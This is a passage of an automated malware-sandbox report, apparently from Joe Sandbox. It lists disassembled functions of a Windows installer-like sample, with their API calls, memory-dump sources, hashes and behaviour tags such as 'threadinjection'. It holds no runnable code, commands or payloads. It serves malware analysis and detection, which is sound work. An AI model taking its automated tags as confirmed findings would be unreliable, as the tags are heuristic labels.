                                                                            • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                            • String ID: IMAGES$STATIC
                                                                            • API String ID: 4202116410-1168396491
                                                                            • Opcode ID: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                                            • Instruction ID: 87364bf851807a9d3783278cfb79ffb10547d227827cc6f6944e766e6ae994b9
                                                                            • Opcode Fuzzy Hash: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                                            • Instruction Fuzzy Hash: 00418F31900108FFCB119FA0DC4CEEF7F79EF49741B008065FA05A61A0D7798A55DB64
                                                                            Function 00408B36 Relevance: 27.1, APIs: 18, Instructions: 144windowcomtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                              • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                            • GetDlgItem.USER32(?,000004B8), ref: 00408B63
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408B72
                                                                            • GetDlgItem.USER32(?,000004B5), ref: 00408BB9
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00408BBE
                                                                            • GetDlgItem.USER32(?,000004B5), ref: 00408BCE
                                                                            • SetWindowLongW.USER32(00000000), ref: 00408BD1
                                                                            • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00408BF7
                                                                            • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408C09
                                                                            • GetDlgItem.USER32(?,000004B4), ref: 00408C13
                                                                            • SetFocus.USER32(00000000), ref: 00408C16
                                                                            • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408C45
                                                                            • CoCreateInstance.OLE32(00416E80,00000000,00000001,00416B08,?), ref: 00408C69
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00408C86
                                                                            • IsWindow.USER32(00000000), ref: 00408C89
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00408C99
                                                                            • EnableWindow.USER32(00000000), ref: 00408C9C
                                                                            • GetDlgItem.USER32(?,000004B5), ref: 00408CB0
                                                                            • ShowWindow.USER32(00000000), ref: 00408CB3
                                                                              • Part of subcall function 00407A3B: GetDlgItem.USER32(?,000004B6), ref: 00407A49
                                                                              • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                              • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                                              • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                              • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                              • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                              • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                                              • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                              • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                              • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                              • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                              • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                              • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                              • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                              • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                              • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                              • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
                                                                            • String ID:
                                                                            • API String ID: 1057135554-0
                                                                            • Opcode ID: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                                            • Instruction ID: 260128caa5a256333788f33680fc13296caa9e9ac1428af8f37f53b95f277c78
                                                                            • Opcode Fuzzy Hash: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                                            • Instruction Fuzzy Hash: E1415B71644708EBDA246F26DE49F977BADEB80B54F00853DF555A62E0CF79AC00CA2C
                                                                            Function 004072F5 Relevance: 24.3, APIs: 16, Instructions: 294COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000004B3), ref: 0040731D
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00407322
                                                                            • GetDlgItem.USER32(?,000004B4), ref: 00407359
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0040735E
                                                                            • GetSystemMetrics.USER32(00000010), ref: 004073E0
                                                                            • GetSystemMetrics.USER32(00000011), ref: 004073E6
                                                                            • GetSystemMetrics.USER32(00000008), ref: 004073ED
                                                                            • GetSystemMetrics.USER32(00000007), ref: 004073F4
                                                                            • GetParent.USER32(?), ref: 00407418
                                                                            • GetClientRect.USER32(00000000,?), ref: 0040742A
                                                                            • ClientToScreen.USER32(?,?), ref: 0040743D
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 004074A3
                                                                            • GetClientRect.USER32(?,?), ref: 0040753D
                                                                              • Part of subcall function 004072C6: GetDlgItem.USER32(?,?), ref: 004072E4
                                                                              • Part of subcall function 004072C6: SetWindowPos.USER32(00000000), ref: 004072EB
                                                                            • ClientToScreen.USER32(?,?), ref: 00407446
                                                                              • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                                            • GetSystemMetrics.USER32(00000008), ref: 004075C2
                                                                            • GetSystemMetrics.USER32(00000007), ref: 004075C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                            • String ID:
                                                                            • API String ID: 747815384-0
                                                                            • Opcode ID: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                                            • Instruction ID: 27a08476a10642596e4b9d74cae09f61027c0f3cc76a3fdd313218faaf2b79ea
                                                                            • Opcode Fuzzy Hash: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                                            • Instruction Fuzzy Hash: 69A13C71E04609AFDB14CFB9CD85AEEBBF9EB48304F148529E905F3291D778E9008B65
                                                                            Function 0041382F Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                            • String ID:
                                                                            • API String ID: 801014965-0
                                                                            • Opcode ID: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                                            • Instruction ID: 5122df4da7c12dbd5cee10cc3a7810c6062e66137140a5a107582b8573bb02de
                                                                            • Opcode Fuzzy Hash: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                                            • Instruction Fuzzy Hash: BA415BB1D50744EFDB219FA4D845BEA7BB8EB49711F20412FE44197391C7B84A81CB58
                                                                            Function 00407823 Relevance: 16.6, APIs: 11, Instructions: 87windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 00407831
                                                                            • GetWindowLongW.USER32(00000000), ref: 00407838
                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0040784E
                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0040786B
                                                                            • GetSystemMetrics.USER32(00000031), ref: 0040787D
                                                                            • GetSystemMetrics.USER32(00000032), ref: 00407884
                                                                            • GetWindowDC.USER32(?), ref: 00407896
                                                                            • GetWindowRect.USER32(?,?), ref: 004078A3
                                                                            • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 004078D7
                                                                            • ReleaseDC.USER32(?,00000000), ref: 004078DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                            • String ID:
                                                                            • API String ID: 2586545124-0
                                                                            • Opcode ID: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
                                                                            • Instruction ID: 0b69cac6d3a88e426d6ff8758e07239202df165225e4a2dce5f130aa01be730a
                                                                            • Opcode Fuzzy Hash: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
                                                                            • Instruction Fuzzy Hash: E021F97650060AEFCB01AFA8DD48EDF3BA9FB48351F008525F915E6190CB74E910DB65
                                                                            Function 00403BA2 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403BE9
                                                                              • Part of subcall function 00402A0D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402A80
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403C0F
                                                                            • wsprintfA.USER32 ref: 00403C31
                                                                            • wsprintfA.USER32 ref: 00403C5E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$wsprintf
                                                                            • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                            • API String ID: 2704270482-695273242
                                                                            • Opcode ID: 01de58c80c2895727725e476a1aa16912d604cd70d675cdd3169202dfa8a1add
                                                                            • Instruction ID: 9d93b3f3b108edfb0f00dda14ecc0a1ac1becc65812ee6aaf2e5fef7c6953118
                                                                            • Opcode Fuzzy Hash: 01de58c80c2895727725e476a1aa16912d604cd70d675cdd3169202dfa8a1add
                                                                            • Instruction Fuzzy Hash: 9D21B472B00519ABDB01FAA5CD85EFD73ADAB48704F14802FF504F32C1CB789A068B99
                                                                            Function 00407028 Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000004B3), ref: 0040703C
                                                                            • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040704F
                                                                            • GetDlgItem.USER32(?,000004B4), ref: 00407059
                                                                            • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00407061
                                                                            • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00407071
                                                                            • GetDlgItem.USER32(?,?), ref: 0040707A
                                                                            • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00407082
                                                                            • GetDlgItem.USER32(?,?), ref: 0040708B
                                                                            • SetFocus.USER32(00000000,?,?,00000000,00407F9B,000004B3,00000000,?,000004B3), ref: 0040708E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMessageSend$Focus
                                                                            • String ID:
                                                                            • API String ID: 3946207451-0
                                                                            • Opcode ID: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
                                                                            • Instruction ID: ac3eac6f6a5d23dfb33c6f00e103186fc87c4e398078883204236830092b285c
                                                                            • Opcode Fuzzy Hash: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
                                                                            • Instruction Fuzzy Hash: 9BF04F72240708BBEA212B61DD86F9BBA5EDF80B54F018425F340650F0CBF3AC109A28
                                                                            Function 00407649 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(uxtheme,?,004089A8,000004B1,00000000,?,?,?,?,?,00408AB5), ref: 00407651
                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407662
                                                                            • GetWindow.USER32(?,00000005), ref: 0040767B
                                                                            • GetWindow.USER32(00000000,00000002), ref: 00407691
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: Window$AddressLibraryLoadProc
                                                                            • String ID: hA$SetWindowTheme$uxtheme
                                                                            • API String ID: 324724604-1539679821
                                                                            • Opcode ID: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
                                                                            • Instruction ID: 96ee7b80554ba3a4b118cc962054e33398f60e347ce36d0b88b8db399e3538ac
                                                                            • Opcode Fuzzy Hash: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
                                                                            • Instruction Fuzzy Hash: 3FF02772E46F2533C231136A6C48F9B669C9F85B707064536B805F7281DAAAEC0081EC
                                                                            Function 0040769E Relevance: 12.1, APIs: 8, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,00419438,00000160), ref: 004076BD
                                                                            • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 004076DC
                                                                            • GetDC.USER32(00000000), ref: 004076E7
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004076F3
                                                                            • MulDiv.KERNEL32(?,00000048,00000000), ref: 00407702
                                                                            • ReleaseDC.USER32(00000000,?), ref: 00407710
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00407738
                                                                            • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00006EE0), ref: 0040776D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                            • String ID:
                                                                            • API String ID: 2693764856-0
                                                                            • Opcode ID: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
                                                                            • Instruction ID: 6b4ef5ea24060658d5863b79bc38f96fa154aaa2e89c1bfb3ba309e5e1f78dd9
                                                                            • Opcode Fuzzy Hash: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
                                                                            • Instruction Fuzzy Hash: 8021D1B1900618FFD7215BA19C88EEB7B7CFB44741F0000B6FA09A2290D7749E848F69
                                                                            Function 0040720C Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 0040721C
                                                                            • GetSystemMetrics.USER32(0000000B), ref: 00407238
                                                                            • GetSystemMetrics.USER32(0000003D), ref: 00407241
                                                                            • GetSystemMetrics.USER32(0000003E), ref: 00407249
                                                                            • SelectObject.GDI32(?,?), ref: 00407266
                                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00407281
                                                                            • SelectObject.GDI32(?,?), ref: 004072A7
                                                                            • ReleaseDC.USER32(?,?), ref: 004072B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                            • String ID:
                                                                            • API String ID: 2466489532-0
                                                                            • Opcode ID: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
                                                                            • Instruction ID: 0ddf9739e914bca3a0fdf19f43e85ccaed600b4ac583c8006899e124ffc187c2
                                                                            • Opcode Fuzzy Hash: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
                                                                            • Instruction Fuzzy Hash: 3C216572900609EFCB018FA5DD44A8EBFF4EF48364F20C4AAE419A72A0C335AA50DF40
                                                                            Function 00408196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081D0
                                                                            • GetDlgItem.USER32(?,000004B8), ref: 004081EE
                                                                            • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00408200
                                                                            • wsprintfW.USER32 ref: 0040821E
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 004082B6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                            • String ID: %d%%
                                                                            • API String ID: 3753976982-1518462796
                                                                            • Opcode ID: feb85234e790cb1b9b57286cee245e86f42689e6b92afad3e333e99d88824fca
                                                                            • Instruction ID: c98f75f04a9c9230d8836c9ffda7361431c24c45b39ddc8f7b463edf0082575f
                                                                            • Opcode Fuzzy Hash: feb85234e790cb1b9b57286cee245e86f42689e6b92afad3e333e99d88824fca
                                                                            • Instruction Fuzzy Hash: F7319171900704FBCB159F60DD45EDA7BB9FF48704F10806EFA46662E1CB75AA11CB68
                                                                            Function 004083AD Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EndDialog.USER32(?,00000000), ref: 004083C7
                                                                            • KillTimer.USER32(?,00000001), ref: 004083D8
                                                                            • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408402
                                                                            • SuspendThread.KERNEL32(0000029C), ref: 0040841B
                                                                            • ResumeThread.KERNEL32(0000029C), ref: 00408438
                                                                            • EndDialog.USER32(?,00000000), ref: 0040845A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: DialogThreadTimer$KillResumeSuspend
                                                                            • String ID:
                                                                            • API String ID: 4151135813-0
                                                                            • Opcode ID: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
                                                                            • Instruction ID: a6440e5942dbc82c6b0340cb4ae65663e5addf35b072ffdb2faf6fa56e3ea6cc
                                                                            • Opcode Fuzzy Hash: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
                                                                            • Instruction Fuzzy Hash: 59119171200B09EFD7146F61EE94AAB3BADFB81B49704C03EF996A11A1DB355C10DA6C
                                                                            Function 00404032 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00404078
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?), ref: 004040B6
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000), ref: 004040DC
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?), ref: 004040E4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID: %%M/$%%M\
                                                                            • API String ID: 613200358-4143866494
                                                                            • Opcode ID: 0374d482a13ba9aee8c5e10bc5e2984b567f93264fe1f34f69114edc9141db84
                                                                            • Instruction ID: 0aef16b05ee34c363868bff67d8d58263bc671b78327bff7a9d128d2c4d1c409
                                                                            • Opcode Fuzzy Hash: 0374d482a13ba9aee8c5e10bc5e2984b567f93264fe1f34f69114edc9141db84
                                                                            • Instruction Fuzzy Hash: AC11F935C0010AFADF05FFA1D993CED7B39AF10308F50812AB915721E1DB7866899B88
                                                                            Function 00403EBC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403F02
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?), ref: 00403F40
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000), ref: 00403F66
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?), ref: 00403F6E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
